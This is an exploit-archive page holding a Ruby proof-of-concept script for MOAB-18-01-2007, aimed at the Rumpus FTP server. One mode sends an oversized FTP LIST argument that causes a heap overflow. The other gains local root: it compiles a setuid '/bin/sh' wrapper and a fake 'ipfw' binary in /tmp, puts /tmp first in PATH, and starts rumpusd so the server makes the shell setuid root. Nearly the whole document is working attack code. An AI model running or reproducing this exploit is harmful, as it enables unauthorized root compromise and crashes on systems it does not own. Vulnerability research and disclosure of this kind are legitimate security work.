Home / exploits MOAB-18-01-2007.rb.txt
Posted on 20 January 2007
#!/usr/bin/ruby # Copyright (c) Lance M. Havok <lmh [at] info-pull.com> # Keiv Finisterre <kf_lists [at] digitalmunition.com> # # Proof of concept for issues described in MOAB-18-01-2007. require 'net/ftp' require 'socket' bugselected = (ARGV[0] || 0).to_i target_host = (ARGV[1] || "localhost") target_user = (ARGV[2] || "anonymous") target_pass = (ARGV[3] || "rumproast") def list_bug(o) payload = "A" * 251 payload << [0x41424344].pack("V") payload << [0x61626364].pack("V") payload << [0x30313233].pack("V") payload << [0xdeadface].pack("V") o.list(payload) end def local_priv_escalation() wrapper = 'int main() { setuid(0); setgid(0); system("/bin/sh -i"); return 0; }' fake_ipfw = 'int main() { system("/usr/sbin/chown root: /tmp/shX; /bin/chmod 4755 /tmp/shX"); return 0; }' command_line = "echo '#{wrapper}' > /tmp/test.c && cc -o /tmp/shX /tmp/test.c && " + "echo '#{fake_ipfw}' > /tmp/ipfw.c && cc -o /tmp/ipfw /tmp/ipfw.c && " + 'export PATH="/tmp/:$PATH" && /usr/local/Rumpus/rumpusd' system command_line sleep 1 puts "++ Enjoy root shell..." system "/tmp/shX" end case bugselected when 0 puts "++ FTP LIST heap buffer overflow..." Net::FTP.open(target_host) do |ftp| ftp.login("#{target_user}","#{target_pass}") list_bug(ftp) end when 1 puts "++ Local privilege escalation..." local_priv_escalation() end